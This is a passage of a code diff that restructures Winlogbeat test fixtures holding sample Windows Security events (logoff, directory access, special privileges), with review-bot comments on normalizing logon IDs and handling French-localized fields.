bb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"hostname\",\"mac\":[\"00-00-00-00-00-00-00-00\",\"11
-11-11-11-11-11\",\"A0-B1-C2-D3-E4-F5\",\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.14393.7426 (rs1_release.240926-1524)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2016 Datacenter\",\"build\":\"14393.7428\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"fe80::1234:5678:90ab:cde\",\"5.6.7.8\",\"fe80::1111:2222:3333:4444\",\"4.3.2.1\",\"fe80::aaaa:bbbb:cccc:dddd\",\"1.2.3.4\",\"fe80::1234:abcd:ef\",\"fe80::abcd:1234:567\",\"fe80::a0b1:c2d:3e4\"]},\"tags\":[\"Windows\",\"beats_input_raw_event\"]}", diff --git a/Beats/winlogbeat/tests/security_event_4634.json b/Beats/winlogbeat/tests/security_event_4634.json index ddc69e63b..035469c13 100644 --- a/Beats/winlogbeat/tests/security_event_4634.json +++ b/Beats/winlogbeat/tests/security_event_4634.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:42:47.895Z\",\"event\":{\"action\":\"Logoff\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4634\",\"created\":\"2024-11-12T08:42:48.190Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\"},\"message\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. 
Logon IDs are only unique between reboots on the same computer.\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"Logoff\",\"channel\":\"Security\",\"process\":{\"pid\":704,\"thread\":{\"id\":6336}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"TargetLogonId\":\"0x5ed35bb6\",\"TargetUserSid\":\"S-1-2-3\",\"LogonType\":\"3\",\"TargetDomainName\":\"J_DOE\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.jdoe.com\",\"record_id\":15983780774,\"event_id\":\"4634\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\",\"5.6.7.8\"]}}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": 
"{\"@timestamp\":\"2024-11-12T08:42:47.895Z\",\"event\":{\"action\":\"Logoff\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4634\",\"created\":\"2024-11-12T08:42:48.190Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\"},\"message\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. 
Logon IDs are only unique between reboots on the same computer.\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"Logoff\",\"channel\":\"Security\",\"process\":{\"pid\":704,\"thread\":{\"id\":6336}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"TargetLogonId\":\"0x5ed35bb6\",\"TargetUserSid\":\"S-1-2-3\",\"LogonType\":\"3\",\"TargetDomainName\":\"J_DOE\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.jdoe.com\",\"record_id\":15983780774,\"event_id\":\"4634\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\",\"5.6.7.8\"]}}" + } }, "expected": { "message": "{\"@timestamp\":\"2024-11-12T08:42:47.895Z\",\"event\":{\"action\":\"Logoff\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4634\",\"created\":\"2024-11-12T08:42:48.190Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount 
Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\"},\"message\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit 
Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"Logoff\",\"channel\":\"Security\",\"process\":{\"pid\":704,\"thread\":{\"id\":6336}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"TargetLogonId\":\"0x5ed35bb6\",\"TargetUserSid\":\"S-1-2-3\",\"LogonType\":\"3\",\"TargetDomainName\":\"J_DOE\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.jdoe.com\",\"record_id\":15983780774,\"event_id\":\"4634\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\",\"5.6.7.8\"]}}", diff --git a/Beats/winlogbeat/tests/security_event_4662.json b/Beats/winlogbeat/tests/security_event_4662.json index 3d80320f5..3f1de8e53 100644 --- a/Beats/winlogbeat/tests/security_event_4662.json +++ b/Beats/winlogbeat/tests/security_event_4662.json 
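Review bot: The rendered text and the structured field disagree on the case of the logon session id in this fixture — `Logon ID:\t\t0x5ED35BB6` in `message`/`event.original` versus `"TargetLogonId":"0x5ed35bb6"` in `winlog.event_data` — and, as the event text itself says, a 4634 is only useful when it can be joined to its 4624 on that id. The `expected` side of the fixture continues outside the hunk, so I cannot see which source the parser reads; it should pin the logon id to one normalized form (the lower-case hex already used by the structured field) so logon/logoff correlation does not depend on whether a value came from the template text or from `event_data`. The input only moved under `input.message` here, so this is a request on the assertions rather than on the moved text.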
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T09:07:11.844Z\",\"message\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"tags\":[\"beats_input_codec_plain_applied\"],\"event\":{\"created\":\"2024-11-12T09:07:13.714Z\",\"action\":\"Directory Service Access\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"outcome\":\"success\",\"code\":\"4662\",\"original\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s 
:\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"kind\":\"event\"},\"@version\":\"1\",\"agent\":{\"name\":\"ACCOUNT01\",\"ephemeral_id\":\"12345678-1234-5678-9012-345678901234\",\"type\":\"winlogbeat\",\"version\":\"8.12.2\",\"id\":\"abcdefab-cdef-abcd-efab-cdefabcdefab\"},\"host\":{\"hostname\":\"account01\",\"mac\":[\"00-11-22-33-44-55\"],\"architecture\":\"x86_64\",\"id\":\"11111111-2222-aaaa-bbbb-333333333333\",\"name\":\"account01\",\"ip\":[\"1.2.3.4\"],\"os\":{\"type\":\"windows\",\"build\":\"17763.6414\",\"name\":\"Windows Server 2019 Standard\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"version\":\"10.0\",\"family\":\"windows\"}},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"api\":\"wineventlog\",\"channel\":\"Security\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"task\":\"Directory Service Access\",\"process\":{\"pid\":744,\"thread\":{\"id\":864}},\"record_id\":476080242,\"event_id\":\"4662\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"opcode\":\"Informations\",\"computer_name\":\"ACCOUNT01.domain.local\",\"event_data\":{\"HandleId\":\"0x0\",\"SubjectLogonId\":\"0xc2b9d138\",\"ObjectType\":\"%{11111111-aaaa-2222-bbbb-333333333333}\",\"ObjectServer\":\"DS\",\"OperationType\":\"Object Access\",\"SubjectUserSid\":\"S-1-2-3\",\"AdditionalInfo\":\"-\",\"AccessMask\":\"0x100\",\"SubjectDomainName\":\"DOMAIN\",\"ObjectName\":\"%{12345678-abcd-ef90-1234-abcdef123456}\",\"SubjectUserName\":\"ACCOUNT01$\",\"AccessList\":\"%%7688\\n\\t\\t\\t\\t\",\"Properties\":\"%%7688\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\"}}}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", 
"dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T09:07:11.844Z\",\"message\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"tags\":[\"beats_input_codec_plain_applied\"],\"event\":{\"created\":\"2024-11-12T09:07:13.714Z\",\"action\":\"Directory Service Access\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"outcome\":\"success\",\"code\":\"4662\",\"original\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s 
:\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"kind\":\"event\"},\"@version\":\"1\",\"agent\":{\"name\":\"ACCOUNT01\",\"ephemeral_id\":\"12345678-1234-5678-9012-345678901234\",\"type\":\"winlogbeat\",\"version\":\"8.12.2\",\"id\":\"abcdefab-cdef-abcd-efab-cdefabcdefab\"},\"host\":{\"hostname\":\"account01\",\"mac\":[\"00-11-22-33-44-55\"],\"architecture\":\"x86_64\",\"id\":\"11111111-2222-aaaa-bbbb-333333333333\",\"name\":\"account01\",\"ip\":[\"1.2.3.4\"],\"os\":{\"type\":\"windows\",\"build\":\"17763.6414\",\"name\":\"Windows Server 2019 Standard\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"version\":\"10.0\",\"family\":\"windows\"}},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"api\":\"wineventlog\",\"channel\":\"Security\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"task\":\"Directory Service Access\",\"process\":{\"pid\":744,\"thread\":{\"id\":864}},\"record_id\":476080242,\"event_id\":\"4662\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"opcode\":\"Informations\",\"computer_name\":\"ACCOUNT01.domain.local\",\"event_data\":{\"HandleId\":\"0x0\",\"SubjectLogonId\":\"0xc2b9d138\",\"ObjectType\":\"%{11111111-aaaa-2222-bbbb-333333333333}\",\"ObjectServer\":\"DS\",\"OperationType\":\"Object Access\",\"SubjectUserSid\":\"S-1-2-3\",\"AdditionalInfo\":\"-\",\"AccessMask\":\"0x100\",\"SubjectDomainName\":\"DOMAIN\",\"ObjectName\":\"%{12345678-abcd-ef90-1234-abcdef123456}\",\"SubjectUserName\":\"ACCOUNT01$\",\"AccessList\":\"%%7688\\n\\t\\t\\t\\t\",\"Properties\":\"%%7688\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\"}}}" + } }, "expected": { "message": 
"{\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T09:07:11.844Z\",\"message\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"tags\":[\"beats_input_codec_plain_applied\"],\"event\":{\"created\":\"2024-11-12T09:07:13.714Z\",\"action\":\"Directory Service Access\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"outcome\":\"success\",\"code\":\"4662\",\"original\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler 
l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"kind\":\"event\"},\"@version\":\"1\",\"agent\":{\"name\":\"ACCOUNT01\",\"ephemeral_id\":\"12345678-1234-5678-9012-345678901234\",\"type\":\"winlogbeat\",\"version\":\"8.12.2\",\"id\":\"abcdefab-cdef-abcd-efab-cdefabcdefab\"},\"host\":{\"hostname\":\"account01\",\"mac\":[\"00-11-22-33-44-55\"],\"architecture\":\"x86_64\",\"id\":\"11111111-2222-aaaa-bbbb-333333333333\",\"name\":\"account01\",\"ip\":[\"1.2.3.4\"],\"os\":{\"type\":\"windows\",\"build\":\"17763.6414\",\"name\":\"Windows Server 2019 Standard\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"version\":\"10.0\",\"family\":\"windows\"}},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"api\":\"wineventlog\",\"channel\":\"Security\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"task\":\"Directory Service Access\",\"process\":{\"pid\":744,\"thread\":{\"id\":864}},\"record_id\":476080242,\"event_id\":\"4662\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"opcode\":\"Informations\",\"computer_name\":\"ACCOUNT01.domain.local\",\"event_data\":{\"HandleId\":\"0x0\",\"SubjectLogonId\":\"0xc2b9d138\",\"ObjectType\":\"%{11111111-aaaa-2222-bbbb-333333333333}\",\"ObjectServer\":\"DS\",\"OperationType\":\"Object Access\",\"SubjectUserSid\":\"S-1-2-3\",\"AdditionalInfo\":\"-\",\"AccessMask\":\"0x100\",\"SubjectDomainName\":\"DOMAIN\",\"ObjectName\":\"%{12345678-abcd-ef90-1234-abcdef123456}\",\"SubjectUserName\":\"ACCOUNT01$\",\"AccessList\":\"%%7688\\n\\t\\t\\t\\t\",\"Properties\":\"%%7688\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\"}}}", 
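Review bot: This fixture is a French-localized Security event — `winlog.keywords` is `Succès de l’audit` and `winlog.opcode` is `Informations` — while `event.outcome` is `success` and `event.action` is `Directory Service Access`, so any parser or rule that derives the outcome from an `Audit Success`/`Audit Failure` keyword (the form the 4625 fixture above carries) would silently miss on such hosts. The `expected` section continues outside the hunk; it should assert that `event.outcome` is taken from the structured `event.outcome` field rather than from `keywords`. Note also that `AccessList` and `Properties` contain the unresolved resource placeholder `%%7688` rather than the `Control Access` text that appears in the rendered message, so any matching on the access name (this is the 0x100 control-access mask on a DS object that replication-rights detections key on) must accept the `%%` form or resolve it.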
diff --git a/Beats/winlogbeat/tests/security_event_4672.json b/Beats/winlogbeat/tests/security_event_4672.json index 59c3d35b3..ec935a02c 100644 --- a/Beats/winlogbeat/tests/security_event_4672.json +++ b/Beats/winlogbeat/tests/security_event_4672.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"code\":\"4672\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:08:54.122Z\",\"action\":\"Special Logon\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:08:50.647Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges 
:\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"host\":{\"name\":\"USER01-WIN.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Special Logon\",\"computer_name\":\"USER01-WIN.domain.priv\",\"keywords\":[\"Succ\u00e8s de 